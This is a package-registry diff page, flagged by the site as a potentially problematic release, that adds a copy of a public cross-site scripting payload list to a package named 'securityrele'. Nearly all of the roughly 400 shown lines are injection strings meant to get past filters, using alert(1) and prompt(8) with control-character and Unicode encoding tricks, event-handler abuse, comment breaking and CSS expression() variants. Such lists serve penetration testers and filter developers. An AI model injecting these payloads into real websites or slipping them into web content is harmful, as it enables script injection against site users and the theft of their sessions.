securityrele 0.0.1-security → 0.0.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of securityrele might be problematic. Click here for more details.

@@ -0,0 +1,2697 @@
1
+ <!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List -->
2
+ <!-- Author : Ismail Tasdelen -->
3
+ <!-- Linkedin : https://www.linkedin.com/in/ismailtasdelen/ -->
4
+ <!-- GitHub : https://github.com/ismailtasdelen/ -->
5
+ <!-- Twitter : https://twitter.com/ismailtsdln -->
6
+ <!-- Medium : https://medium.com/@ismailtasdelen -->
7
+
8
+ "-prompt(8)-"
9
+ '-prompt(8)-'
10
+ ";a=prompt,a()//
11
+ ';a=prompt,a()//
12
+ '-eval("window['pro'%2B'mpt'](8)")-'
13
+ "-eval("window['pro'%2B'mpt'](8)")-"
14
+ "onclick=prompt(8)>"@x.y
15
+ "onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
16
+ <image/src/onerror=prompt(8)>
17
+ <img/src/onerror=prompt(8)>
18
+ <image src/onerror=prompt(8)>
19
+ <img src/onerror=prompt(8)>
20
+ <image src =q onerror=prompt(8)>
21
+ <img src =q onerror=prompt(8)>
22
+ </scrip</script>t><img src =q onerror=prompt(8)>
23
+ <script\x20type="text/javascript">javascript:alert(1);</script>
24
+ <script\x3Etype="text/javascript">javascript:alert(1);</script>
25
+ <script\x0Dtype="text/javascript">javascript:alert(1);</script>
26
+ <script\x09type="text/javascript">javascript:alert(1);</script>
27
+ <script\x0Ctype="text/javascript">javascript:alert(1);</script>
28
+ <script\x2Ftype="text/javascript">javascript:alert(1);</script>
29
+ <script\x0Atype="text/javascript">javascript:alert(1);</script>
30
+ '`"><\x3Cscript>javascript:alert(1)</script>
31
+ '`"><\x00script>javascript:alert(1)</script>
32
+ <img src=1 href=1 onerror="javascript:alert(1)"></img>
33
+ <audio src=1 href=1 onerror="javascript:alert(1)"></audio>
34
+ <video src=1 href=1 onerror="javascript:alert(1)"></video>
35
+ <body src=1 href=1 onerror="javascript:alert(1)"></body>
36
+ <image src=1 href=1 onerror="javascript:alert(1)"></image>
37
+ <object src=1 href=1 onerror="javascript:alert(1)"></object>
38
+ <script src=1 href=1 onerror="javascript:alert(1)"></script>
39
+ <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
40
+ <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
41
+ <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
42
+ <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
43
+ <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
44
+ <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
45
+ <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
46
+ <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
47
+ <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
48
+ <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
49
+ <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
50
+ <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
51
+ <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
52
+ <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
53
+ <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
54
+ <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
55
+ <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
56
+ <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
57
+ <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
58
+ <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
59
+ <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
60
+ <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
61
+ <applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
62
+ <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
63
+ <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
64
+ <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
65
+ <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
66
+ <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
67
+ <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
68
+ <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
69
+ <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
70
+ <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
71
+ <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
72
+ <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
73
+ <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
74
+ <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
75
+ <body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
76
+ <object onError object onError="javascript:javascript:alert(1)"></object onError>
77
+ <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
78
+ <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
79
+ <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
80
+ <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
81
+ <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
82
+ <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
83
+ <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
84
+ <body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
85
+ <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
86
+ <body onload body onload="javascript:javascript:alert(1)"></body onload>
87
+ <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
88
+ <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
89
+ <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
90
+ <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
91
+ <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
92
+ <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
93
+ <iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
94
+ <svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
95
+ <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
96
+ <body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
97
+ \x3Cscript>javascript:alert(1)</script>
98
+ '"`><script>/* *\x2Fjavascript:alert(1)// */</script>
99
+ <script>javascript:alert(1)</script\x0D
100
+ <script>javascript:alert(1)</script\x0A
101
+ <script>javascript:alert(1)</script\x0B
102
+ <script charset="\x22>javascript:alert(1)</script>
103
+ <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
104
+ --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
105
+ --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
106
+ --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
107
+ --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
108
+ `"'><img src='#\x27 onerror=javascript:alert(1)>
109
+ <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
110
+ "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
111
+ <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
112
+ <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
113
+ <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
114
+ <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
115
+ <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
116
+ <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
117
+ <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
118
+ <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
119
+ <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
120
+ <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
121
+ <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
122
+ <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
123
+ <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
124
+ <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
125
+ <script>/* *\x2A/javascript:alert(1)// */</script>
126
+ <script>/* *\x00/javascript:alert(1)// */</script>
127
+ <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
128
+ <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
129
+ <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
130
+ <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
131
+ <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
132
+ "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
133
+ "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
134
+ %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
135
+ <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
136
+ <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
137
+ <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
138
+ '`"><\x3Cscript>javascript:alert(1)</script>
139
+ '`"><\x00script>javascript:alert(1)</script>
140
+ "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
141
+ "'`><\x00img src=xxx:x onerror=javascript:alert(1)>
142
+ <script src="data:text/plain\x2Cjavascript:alert(1)"></script>
143
+ <script src="data:\xD4\x8F,javascript:alert(1)"></script>
144
+ <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
145
+ <script src="data:\xCB\x8F,javascript:alert(1)"></script>
146
+ <script\x20type="text/javascript">javascript:alert(1);</script>
147
+ <script\x3Etype="text/javascript">javascript:alert(1);</script>
148
+ <script\x0Dtype="text/javascript">javascript:alert(1);</script>
149
+ <script\x09type="text/javascript">javascript:alert(1);</script>
150
+ <script\x0Ctype="text/javascript">javascript:alert(1);</script>
151
+ <script\x2Ftype="text/javascript">javascript:alert(1);</script>
152
+ <script\x0Atype="text/javascript">javascript:alert(1);</script>
153
+ ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
154
+ ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
155
+ ABC<div style="x:expression\x00(javascript:alert(1)">DEF
156
+ ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
157
+ ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
158
+ ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
159
+ ABC<div style="x:\x09expression(javascript:alert(1)">DEF
160
+ ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
161
+ ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
162
+ ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
163
+ ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
164
+ ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
165
+ ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
166
+ ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
167
+ ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
168
+ ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
169
+ ABC<div style="x:\x20expression(javascript:alert(1)">DEF
170
+ ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
171
+ ABC<div style="x:\x00expression(javascript:alert(1)">DEF
172
+ ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
173
+ ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
174
+ ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
175
+ ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
176
+ ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
177
+ ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
178
+ ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
179
+ ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
180
+ <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
181
+ <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
182
+ <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
183
+ <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
184
+ <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
185
+ <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
186
+ <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
187
+ <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
188
+ <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
189
+ <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
190
+ <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
191
+ <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
192
+ <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
193
+ <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
194
+ <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
195
+ <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
196
+ <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
197
+ <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
198
+ <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
199
+ <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
200
+ <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
201
+ <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
202
+ <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
203
+ <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
204
+ <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
205
+ <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
206
+ <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
207
+ <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
208
+ <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
209
+ <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
210
+ <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
211
+ <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
212
+ <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
213
+ <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
214
+ <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
215
+ <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
216
+ <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
217
+ <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
218
+ <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
219
+ <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
220
+ <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
221
+ <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
222
+ <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
223
+ <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
224
+ <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
225
+ <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
226
+ <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
227
+ <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
228
+ <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
229
+ <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
230
+ <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
231
+ <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
232
+ <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
233
+ <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
234
+ <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
235
+ <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
236
+ <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
237
+ `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
238
+ `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
239
+ `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
240
+ `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
241
+ `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
242
+ `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
243
+ `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
244
+ `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
245
+ `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
246
+ `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
247
+ "`'><script>\x3Bjavascript:alert(1)</script>
248
+ "`'><script>\x0Djavascript:alert(1)</script>
249
+ "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
250
+ "`'><script>\xE2\x80\x81javascript:alert(1)</script>
251
+ "`'><script>\xE2\x80\x84javascript:alert(1)</script>
252
+ "`'><script>\xE3\x80\x80javascript:alert(1)</script>
253
+ "`'><script>\x09javascript:alert(1)</script>
254
+ "`'><script>\xE2\x80\x89javascript:alert(1)</script>
255
+ "`'><script>\xE2\x80\x85javascript:alert(1)</script>
256
+ "`'><script>\xE2\x80\x88javascript:alert(1)</script>
257
+ "`'><script>\x00javascript:alert(1)</script>
258
+ "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
259
+ "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
260
+ "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
261
+ "`'><script>\x0Cjavascript:alert(1)</script>
262
+ "`'><script>\x2Bjavascript:alert(1)</script>
263
+ "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
264
+ "`'><script>-javascript:alert(1)</script>
265
+ "`'><script>\x0Ajavascript:alert(1)</script>
266
+ "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
267
+ "`'><script>\x7Ejavascript:alert(1)</script>
268
+ "`'><script>\xE2\x80\x87javascript:alert(1)</script>
269
+ "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
270
+ "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
271
+ "`'><script>\xC2\x85javascript:alert(1)</script>
272
+ "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
273
+ "`'><script>\xE2\x80\x83javascript:alert(1)</script>
274
+ "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
275
+ "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
276
+ "`'><script>\xE2\x80\x80javascript:alert(1)</script>
277
+ "`'><script>\x21javascript:alert(1)</script>
278
+ "`'><script>\xE2\x80\x82javascript:alert(1)</script>
279
+ "`'><script>\xE2\x80\x86javascript:alert(1)</script>
280
+ "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
281
+ "`'><script>\x0Bjavascript:alert(1)</script>
282
+ "`'><script>\x20javascript:alert(1)</script>
283
+ "`'><script>\xC2\xA0javascript:alert(1)</script>
284
+ "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
285
+ "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
286
+ "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
287
+ "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
288
+ "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
289
+ "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
290
+ "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
291
+ "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
292
+ "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
293
+ <script\x2F>javascript:alert(1)</script>
294
+ <script\x20>javascript:alert(1)</script>
295
+ <script\x0D>javascript:alert(1)</script>
296
+ <script\x0A>javascript:alert(1)</script>
297
+ <script\x0C>javascript:alert(1)</script>
298
+ <script\x00>javascript:alert(1)</script>
299
+ <script\x09>javascript:alert(1)</script>
300
+ `"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
301
+ `"'><img src=xxx:x onerror\x00=javascript:alert(1)>
302
+ `"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
303
+ `"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
304
+ `"'><img src=xxx:x onerror\x20=javascript:alert(1)>
305
+ `"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
306
+ `"'><img src=xxx:x onerror\x09=javascript:alert(1)>
307
+ <script>javascript:alert(1)<\x00/script>
308
+ <img src=# onerror\x3D"javascript:alert(1)" >
309
+ <input onfocus=javascript:alert(1) autofocus>
310
+ <input onblur=javascript:alert(1) autofocus><input autofocus>
311
+ <video poster=javascript:javascript:alert(1)//
312
+ <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
313
+ <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
314
+ <video><source onerror="javascript:javascript:alert(1)">
315
+ <video onerror="javascript:javascript:alert(1)"><source>
316
+ <form><button formaction="javascript:javascript:alert(1)">X
317
+ <body oninput=javascript:alert(1)><input autofocus>
318
+ <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
319
+ <frameset onload=javascript:alert(1)>
320
+ <table background="javascript:javascript:alert(1)">
321
+ <!--<img src="--><img src=x onerror=javascript:alert(1)//">
322
+ <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
323
+ <![><img src="]><img src=x onerror=javascript:alert(1)//">
324
+ <style><img src="</style><img src=x onerror=javascript:alert(1)//">
325
+ <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
326
+ <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
327
+ <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
328
+ <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
329
+ <object data="data:text/html;base64,%(base64)s">
330
+ <embed src="data:text/html;base64,%(base64)s">
331
+ <b <script>alert(1)</script>0
332
+ <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
333
+ <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
334
+ <embed src="javascript:alert(1)">
335
+ <img src="javascript:alert(1)">
336
+ <image src="javascript:alert(1)">
337
+ <script src="javascript:alert(1)">
338
+ <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
339
+ <? foo="><script>javascript:alert(1)</script>">
340
+ <! foo="><script>javascript:alert(1)</script>">
341
+ </ foo="><script>javascript:alert(1)</script>">
342
+ <? foo="><x foo='?><script>javascript:alert(1)</script>'>">
343
+ <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
344
+ <% foo><x foo="%><script>javascript:alert(1)</script>">
345
+ <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
346
+ <img \x00src=x onerror="alert(1)">
347
+ <img \x47src=x onerror="javascript:alert(1)">
348
+ <img \x11src=x onerror="javascript:alert(1)">
349
+ <img \x12src=x onerror="javascript:alert(1)">
350
+ <img\x47src=x onerror="javascript:alert(1)">
351
+ <img\x10src=x onerror="javascript:alert(1)">
352
+ <img\x13src=x onerror="javascript:alert(1)">
353
+ <img\x32src=x onerror="javascript:alert(1)">
354
+ <img\x47src=x onerror="javascript:alert(1)">
355
+ <img\x11src=x onerror="javascript:alert(1)">
356
+ <img \x47src=x onerror="javascript:alert(1)">
357
+ <img \x34src=x onerror="javascript:alert(1)">
358
+ <img \x39src=x onerror="javascript:alert(1)">
359
+ <img \x00src=x onerror="javascript:alert(1)">
360
+ <img src\x09=x onerror="javascript:alert(1)">
361
+ <img src\x10=x onerror="javascript:alert(1)">
362
+ <img src\x13=x onerror="javascript:alert(1)">
363
+ <img src\x32=x onerror="javascript:alert(1)">
364
+ <img src\x12=x onerror="javascript:alert(1)">
365
+ <img src\x11=x onerror="javascript:alert(1)">
366
+ <img src\x00=x onerror="javascript:alert(1)">
367
+ <img src\x47=x onerror="javascript:alert(1)">
368
+ <img src=x\x09onerror="javascript:alert(1)">
369
+ <img src=x\x10onerror="javascript:alert(1)">
370
+ <img src=x\x11onerror="javascript:alert(1)">
371
+ <img src=x\x12onerror="javascript:alert(1)">
372
+ <img src=x\x13onerror="javascript:alert(1)">
373
+ <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
374
+ <img src=x onerror=\x09"javascript:alert(1)">
375
+ <img src=x onerror=\x10"javascript:alert(1)">
376
+ <img src=x onerror=\x11"javascript:alert(1)">
377
+ <img src=x onerror=\x12"javascript:alert(1)">
378
+ <img src=x onerror=\x32"javascript:alert(1)">
379
+ <img src=x onerror=\x00"javascript:alert(1)">
380
+ <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
381
+ <img src="x` `<script>javascript:alert(1)</script>"` `>
382
+ <img src onerror /" '"= alt=javascript:alert(1)//">
383
+ <title onpropertychange=javascript:alert(1)></title><title title=>
384
+ <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
385
+ <!--[if]><script>javascript:alert(1)</script -->
386
+ <!--[if<img src=x onerror=javascript:alert(1)//]> -->
387
+ <script src="/\%(jscript)s"></script>
388
+ <script src="\\%(jscript)s"></script>
389
+ <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
390
+ <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
391
+ <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
392
+ <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
393
+ <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
394
+ <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
395
+ <style>*[{}@import'%(css)s?]</style>X
396
+ <div style="font-family:'foo&#10;;color:red;';">XXX
397
+ <div style="font-family:foo}color=red;">XXX
398
+ <// style=x:expression\28javascript:alert(1)\29>
399
+ <style>*{x:expression(javascript:alert(1))}</style>
400
+ <div style=content:url(%(svg)s)></div>
401
+ <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
402
+ <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
403
+ <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
404
+ <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
405
+ <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
406
+ <x style="background:url('x&#1;;color:red;/*')">XXX</x>
407
